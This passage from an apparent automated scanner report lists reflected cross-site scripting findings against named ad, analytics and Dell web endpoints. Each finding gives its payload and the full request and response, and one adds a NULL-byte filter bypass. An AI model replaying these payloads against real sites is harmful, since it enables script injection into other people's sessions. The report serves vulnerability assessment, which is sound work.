The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39c75"><script>alert(1)</script>0189dd8aea9 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D39c75"><script>alert(1)</script>0189dd8aea9 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:19 GMT
Vary: Accept-Encoding
Content-Length: 2788
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D39c75"><script>alert(1)</script>0189dd8aea9http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189880" target="_blank">
...[SNIP]...

3.7. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03eb"><script>alert(1)</script>7e59f800e4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&c03eb"><script>alert(1)</script>7e59f800e4f=1 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76d139849e803ea11194558dfe7e; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:27 GMT
Vary: Accept-Encoding
Content-Length: 2797
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&c03eb"><script>alert(1)</script>7e59f800e4f=1http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189887" target="_blank">
...[SNIP]...

3.8. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3597"><script>alert(1)</script>b03c2c220a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&f3597"><script>alert(1)</script>b03c2c220a4=1 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76d1c1c13ab3ee7a7ea9fbf0927e; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:29 GMT
Vary: Accept-Encoding
Content-Length: 2797
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&f3597"><script>alert(1)</script>b03c2c220a4=1" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
...[SNIP]...

3.9. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8d07'-alert(1)-'6c52c7876e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&a8d07'-alert(1)-'6c52c7876e6=1 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:32 GMT
Vary: Accept-Encoding
Content-Length: 2872
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&a8d07'-alert(1)-'6c52c7876e6=1http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189893" target="_blank">
...[SNIP]...

3.10. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 76146<script>alert(1)</script>7493ba11a6a was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData76146<script>alert(1)</script>7493ba11a6a&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2100_NewsReel.html?baseDocId=SB10001424053111904900904576549933849920392
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sun, 04 Sep 2011 16:17:53 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoData76146<script>alert(1)</script>7493ba11a6a({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

3.11. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload a61d8<script>alert(1)</script>7791fa49f3c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvuna61d8<script>alert(1)</script>7791fa49f3c HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2100_NewsReel.html?baseDocId=SB10001424053111904900904576549933849920392
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 16:17:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=5385daf0-5a45-4c91-b8da-57deda1620a8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvuna61d8<script>alert(1)</script>7791fa49f3c)

3.12. http://apps.sapha.com/appshandler.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload %001ed17<script>alert(1)</script>4582190b2ea was submitted in the ac parameter. This input was echoed as 1ed17<script>alert(1)</script>4582190b2ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /appshandler.php?ac=2522%001ed17<script>alert(1)</script>4582190b2ea&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2522=TRUE; sapha_2522_1=1038376%7C214589%7C149788%7C2011-09-04+10%3A18%3A45

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 603
Connection: close
Content-Type: text/html;charset=UTF-8

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 2522.1ed17<script>alert(1)</script>4582190b2ea AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br>
...[SNIP]...

3.13. http://content-cdn.dell.com/JS/default/jsStrings.ashx [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content-cdn.dell.com
Path:   /JS/default/jsStrings.ashx

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3dca'%3balert(1)//c47aa975679 was submitted in the st parameter. This input was echoed as a3dca';alert(1)//c47aa975679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JS/default/jsStrings.ashx?c=us&l=en&s=bsd&cs=04&st=thundera-ui-jsa3dca'%3balert(1)//c47aa975679 HTTP/1.1
Host: content-cdn.dell.com
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Vary: Accept-Encoding
Content-Length: 251
Date: Sun, 04 Sep 2011 16:19:18 GMT
Connection: close
Cache-Control: public, max-age=21600


var DELL = window.DELL || {};
DELL.com = DELL.com || {};
DELL.com.Resources = DELL.com.Resources||{};
var sary=DELL.com.Resources['thundera-ui-jsa3dca';alert(1)//c47aa975679']=[];
for(var i=0;i<sary.length;i++){sary[sary[i].Key]=sary[i].Value}

3.14. http://dce.sapha.com/engine.php [ac parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The value of the ac request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abad5"%3b1a7a9ffcd44 was submitted in the ac parameter. This input was echoed as abad5";1a7a9ffcd44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /engine.php?ac=2522abad5"%3b1a7a9ffcd44 HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding,User-Agent
Content-Length: 5637
Connection: close
Content-Type: application/x-javascript

var SCS_tid=(SCS_tid)?escape(SCS_tid):"",NS_do=new Array('cymphonix.com'),NS_fe=new Array('exe','pdf','zip','wav','mp3','mov','mpg','avi','wmv','doc','xls','wpd','ppt','swf','mpeg','gif','jpg','tar','
...[SNIP]...
,NS_ev=0,NS_la="",NS_js="Undetermined",NS_pn=(NS_pn)?escape(NS_pn):"",NS_vpn=(NS_vpn)?escape(NS_vpn):"",NS_uuid=(NS_uuid)?escape(NS_uuid):"",NS_pt=(document.title)?escape(document.title):"",NS_ac="2522abad5";1a7a9ffcd44",NS_c=(NS_c)?NS_c:"yes",NS_rn=Math.round(Math.random()*(99999-1))+1,NS_ru=document.referrer,NS_vp=(typeof (document.location)!="undefined")?document.location:"",NS_dobj=new Date(),NS_sw=(screen.width)
...[SNIP]...

3.15. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 24b83<script>alert(1)</script>22cc2cf8cfc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153156805-386656&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=3&mbox=MboxTrack24b83<script>alert(1)</script>22cc2cf8cfc&mboxId=0&mboxTime=1315135156805&clicked=undefined&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/JavaScript
Content-Length: 308
Date: Sun, 04 Sep 2011 16:20:22 GMT
Server: Test & Target

mboxFactories.get('default').get('MboxTrack24b83<script>alert(1)</script>22cc2cf8cfc',0).cancelTimeout();mboxFactories.get('default').get('MboxTrack24b83<script>alert(1)</script>22cc2cf8cfc',0).setOff
...[SNIP]...

3.16. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.catid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The value of the profile.catid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2eb52'%3balert(1)//dfc1fb26081 was submitted in the profile.catid parameter. This input was echoed as 2eb52';alert(1)//dfc1fb26081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

